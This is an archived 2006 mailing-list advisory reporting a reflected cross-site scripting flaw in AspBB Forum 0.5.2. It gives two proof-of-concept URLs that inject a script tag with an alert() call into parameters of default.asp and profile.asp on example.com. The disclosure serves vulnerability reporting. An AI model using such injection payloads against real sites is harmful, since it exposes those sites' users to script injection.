OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
AspBB Forum "profile.asp & default.asp" XSS Vulnerability

From: TeufeL Online (teufelhotmail.com)
Date: Thu May 18 2006 - 05:37:53 CDT


This xss works on Aspbb Forums

Homapage : http://www.aspbb.org

Version : 0.5.2

Exploit:

http://www.example.com/default.asp?action="><script>alert('Xss
Vulnerability');</script>

http://www.example.com/profila.asp?get="><script>alert('Xss
Vulnerability');</script>&URL=%2FDefault%2Easp%3F

TeufeL // Netkabus.Com Research And Develop Group

_________________________________________________________________
Real-time chat with your friends - Free download - MSN Messenger
http://messenger.msn.com/?mkt=tr